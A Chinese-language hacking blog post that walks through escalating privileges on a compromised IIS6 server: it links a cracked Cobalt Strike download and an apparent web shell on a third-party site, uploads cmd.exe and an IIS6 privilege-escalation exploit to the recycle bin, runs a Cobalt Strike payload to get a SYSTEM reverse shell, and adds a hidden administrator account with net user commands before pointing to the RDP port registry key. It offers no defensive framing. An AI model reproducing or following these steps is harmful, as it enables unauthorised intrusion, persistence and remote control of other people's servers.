一次使用iis6+cobaltstrike提权

介绍

Armitage是一个图形化的metasploit网络攻击管理工具，它可视化你的攻击目标，推荐exploit和公开了metasploit框架的高级功能。

Armitage是一款Java写的Metasploit图形界面的攻击软件，可以用它结合Metasploit已知的exploit来针对存在的漏洞自动化攻击。bt5、kali linx 下集成免费版本Armitage，Cobalt Strike是它的商业版本，乃们懂得，图形界面非常友好，一键傻瓜化使用MSF高级功能，自动攻击测试。但是不对我大天朝出口，免费使21天，剩下的你们懂的，不喜欢图形界面的筒子请无视。友情提示：win版本请自测有无捆绑。

下载地址如下  http://www.freebuf.com/tools/8445.html(破解版)http://xxoo.com.cn/ewebeditor/UploadFile/2013717212415335.asa    win2k3+支持aspx

相信明眼人一看就知道是ewebeditor编辑器拿的shell 我就不多说方法了 ..
首先上传  cmd.exe iis6.exe 到Z:\RECYCLER\  也就是回收站 
因为支持aspx 所以可以直接执行命令
算了 上个图吧 无图无真相不是 
 
因为iis6是支持 后缀是txt 等各式的 都可以执行命令 稍微等一下  权限很大
接下来我们等一下 打开cobaltstrike 有如下选项
 
我们选择左下角的ADD增加一个Listeners(监听)
 设置如左图 然后点击Save
这样就算增加了一个监听的payload端口是5656

在然后选择attacks选项
 选择如左图


选择了Generate以后 保存的位置 跟名字
 
随便起一个名字  


接下来最后一步执行..(草 图好多)

?

cmd路径Z:\RECYCLER\cmd.exe语句:/c Z:\RECYCLER\iis6.xtx "Z:\RECYCLER\eset.exe"

不一会就会反弹回来

 
为权限比较大,反弹回来就是system的权限,,我们直接选择cmdshell

net user admin 123 /add net localgroup administrators admin /add

添加上管理员即可,终端号可以在注册表查询

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp